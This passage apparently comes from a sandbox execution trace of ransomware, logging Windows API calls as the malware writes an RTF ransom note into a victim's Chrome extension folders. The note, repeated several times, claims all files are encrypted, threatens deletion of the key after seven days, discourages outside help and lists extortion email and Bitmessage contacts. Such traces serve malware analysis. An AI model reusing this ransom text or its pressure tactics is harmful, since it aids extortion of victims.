gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.175] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.176] CloseHandle (hObject=0x2ec) returned 1 [0291.176] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\#readme_eman#.rtf")) returned 0xffffffff [0291.176] GetLastError () returned 0x2 [0291.176] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring 